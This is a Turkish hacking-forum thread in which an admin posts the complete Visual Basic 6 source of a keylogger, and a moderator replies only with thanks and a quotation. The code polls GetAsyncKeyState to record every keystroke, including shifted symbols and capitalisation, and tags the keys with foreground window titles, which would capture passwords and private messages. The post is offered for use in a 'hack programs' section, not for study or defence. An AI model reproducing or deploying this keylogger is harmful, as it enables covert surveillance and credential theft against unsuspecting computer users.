Merhaba Ziyaretçi !
Sitemizden Daha İyi Yararlanabilmek İçin:
Oturum Açın veya Ücretsiz Kaydolun
 
[ Yeni Konular · Üyeler · Forum Kuralları · Arama · RSS ]
Page 1 of 11
Forum » Bilgisayar » Hack Programları » Visula Basic İle Keylogger
Visula Basic İle Keylogger
OzKn07 Tarih: Slı, 03-Kasım-2009, 22:03:50 | Mesaj # 1
Admin
Grup: Adminstrator
Mesajlar: 827
Ödüller: 11
Rep Puanı: 80
Statü: Offline
Code
Private Declare Function GetForegroundWindow Lib "user32" () As Long
Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer
Private Declare Function GetWindowTextLength Lib "user32" Alias "GetWindowTextLengthA" (ByVal hwnd As Long) As Long
Private Declare Function GetWindowText Lib "user32" Alias "GetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long
Private Declare Function GetKeyState Lib "user32" (ByVal nVirtKey As Long) As Integer

Dim a(0 To 9) As String
Dim Baslik As String

Private Sub Timer1_Timer()
On Error Resume Next
Dim BasilanTus As String
Dim dongu As Byte

'If GetForegroundWindow <> HandleNoSu Then
' HandleNoSu = GetForegroundWindow
If Baslik <> BasligiAl(GetForegroundWindow) Then
Baslik = BasligiAl(GetForegroundWindow)
'Else
Text1 = Text1 & " [" & Baslik & "] " & vbCrLf

End If
'End If

If GetAsyncKeyState(13) = -32767 Then
BasilanTus = vbCrLf
GoTo tusuyaz
End If
If GetAsyncKeyState(8) = -32767 Then
Text1 = Left(Text1, Len(Text1) - 1)
GoTo tusuyaz
End If
If GetAsyncKeyState(32) = -32767 Then
BasilanTus = " "
GoTo tusuyaz
End If
If GetAsyncKeyState(186) = -32767 Then
If ShiftTusu = True Then BasilanTus = ":"
If ShiftTusu = False Then BasilanTus = ";"
GoTo tusuyaz
End If
If GetAsyncKeyState(187) = -32767 Then
If ShiftTusu = True Then BasilanTus = "+"
If ShiftTusu = False Then BasilanTus = "="
GoTo tusuyaz
End If
If GetAsyncKeyState(188) = -32767 Then
If ShiftTusu = True Then BasilanTus = "<"
If ShiftTusu = False Then BasilanTus = ","
GoTo tusuyaz
End If
If GetAsyncKeyState(189) = -32767 Then
If ShiftTusu = True Then BasilanTus = "_"
If ShiftTusu = False Then BasilanTus = "-"
GoTo tusuyaz
End If
If GetAsyncKeyState(190) = -32767 Then
If ShiftTusu = True Then BasilanTus = ">"
If ShiftTusu = False Then BasilanTus = "."
GoTo tusuyaz
End If
If GetAsyncKeyState(191) = -32767 Then
If ShiftTusu = True Then BasilanTus = "?"
If ShiftTusu = False Then BasilanTus = "/"
GoTo tusuyaz
End If
If GetAsyncKeyState(192) = -32767 Then
If ShiftTusu = True Then BasilanTus = "~"
If ShiftTusu = False Then BasilanTus = "`"
GoTo tusuyaz
End If
If GetAsyncKeyState(96) = -32767 Then
If ShiftTusu = False Then BasilanTus = "0"
GoTo tusuyaz
End If
If GetAsyncKeyState(97) = -32767 Then
If ShiftTusu = False Then BasilanTus = "1"
GoTo tusuyaz
End If
If GetAsyncKeyState(98) = -32767 Then
If ShiftTusu = False Then BasilanTus = "2"
GoTo tusuyaz
End If
If GetAsyncKeyState(99) = -32767 Then
If ShiftTusu = False Then BasilanTus = "3"
GoTo tusuyaz
End If
If GetAsyncKeyState(100) = -32767 Then
If ShiftTusu = False Then BasilanTus = "4"
GoTo tusuyaz
End If
If GetAsyncKeyState(101) = -32767 Then
If ShiftTusu = False Then BasilanTus = "5"
GoTo tusuyaz
End If
If GetAsyncKeyState(102) = -32767 Then
If ShiftTusu = False Then BasilanTus = "6"
GoTo tusuyaz
End If
If GetAsyncKeyState(103) = -32767 Then
If ShiftTusu = False Then BasilanTus = "7"
GoTo tusuyaz
End If
If GetAsyncKeyState(104) = -32767 Then
If ShiftTusu = False Then BasilanTus = "8"
GoTo tusuyaz
End If
If GetAsyncKeyState(105) = -32767 Then
If ShiftTusu = False Then BasilanTus = "9"
GoTo tusuyaz
End If
If GetAsyncKeyState(106) = -32767 Then
If ShiftTusu = False Then BasilanTus = "*"
GoTo tusuyaz
End If
If GetAsyncKeyState(107) = -32767 Then
If ShiftTusu = False Then BasilanTus = "+"
GoTo tusuyaz
End If
If GetAsyncKeyState(108) = -32767 Then
If ShiftTusu = False Then BasilanTus = ""
Text1.Text = Text1.Text & vbCrLf
GoTo tusuyaz
End If
If GetAsyncKeyState(109) = -32767 Then
If ShiftTusu = False Then BasilanTus = "-"
GoTo tusuyaz
End If
If GetAsyncKeyState(110) = -32767 Then
If ShiftTusu = False Then BasilanTus = "."
GoTo tusuyaz
End If
If GetAsyncKeyState(111) = -32767 Then
If ShiftTusu = False Then BasilanTus = "/"
GoTo tusuyaz
End If
If GetAsyncKeyState(219) = -32767 Then
If ShiftTusu = True Then BasilanTus = "{"
If ShiftTusu = False Then BasilanTus = "["
GoTo tusuyaz
End If
If GetAsyncKeyState(220) = -32767 Then
If ShiftTusu = True Then BasilanTus = "|"
If ShiftTusu = False Then BasilanTus = ""
GoTo tusuyaz
End If
If GetAsyncKeyState(221) = -32767 Then
If ShiftTusu = True Then BasilanTus = "}"
If ShiftTusu = False Then BasilanTus = "]"
GoTo tusuyaz
End If
If GetAsyncKeyState(222) = -32767 Then
If ShiftTusu = True Then BasilanTus = Chr(34)
If ShiftTusu = False Then BasilanTus = "'"
GoTo tusuyaz
End If

dongu = 48
Do Until dongu = 91
If GetAsyncKeyState(dongu) = -32767 Then

If dongu >= 65 And dongu <= 90 Then
If CapsLockTusu = True And ShiftTusu = True Then BasilanTus = LCase(Chr(dongu))
If CapsLockTusu = False And ShiftTusu = False Then BasilanTus = LCase(Chr(dongu))
If CapsLockTusu = True And ShiftTusu = False Then BasilanTus = UCase(Chr(dongu))
If CapsLockTusu = False And ShiftTusu = True Then BasilanTus = UCase(Chr(dongu))
GoTo tusuyaz
End If

If dongu >= 48 And dongu <= 57 And ShiftTusu = True Then
If ShiftTusu = True Then
BasilanTus = a(Val(Chr(dongu)))
GoTo tusuyaz
End If
End If
End If
dongu = dongu + 1
Loop

Exit Sub

tusuyaz:
Text1.Text = Text1.Text & BasilanTus
End Sub

Function BasligiAl(hwnd As Long)
Dim hWndTitle As String
hWndTitle = String(GetWindowTextLength(hwnd), 0)
GetWindowText hwnd, hWndTitle, (GetWindowTextLength(hwnd) + 1)
BasligiAl = hWndTitle
End Function

Public Sub tusuyaz()
Text1.Text = Text1 & BasilanTus
Text1.SelLength = Len(Text1)
End Sub

Public Function ShiftTusu() As Boolean
ShiftTusu = CBool(GetAsyncKeyState(vbKeyShift))
End Function

Public Function CapsLockTusu() As Boolean
CapsLockTusu = CBool(GetKeyState(vbKeyCapital) And 1)
End Function


 
DafXfYearTruck Tarih: Per, 22-Nisan-2010, 19:24:37 | Mesaj # 2
Moderatör
Grup: Moderator
Mesajlar: 412
Ödüller: 9
Rep Puanı: 67
Statü: Offline
teşekkürler."Gel, Gel, ne olursan ol, gel!
İster kâfir, ister mecûsî, ister puta tapan ol, gel! Bizim dergâhımız ümitsizlik dergâhı değildir. Yüz kere tövbeni bozmuş olsan da yine gel!"
Hz. Mevlana 
Forum » Bilgisayar » Hack Programları » Visula Basic İle Keylogger
Page 1 of 11
Search: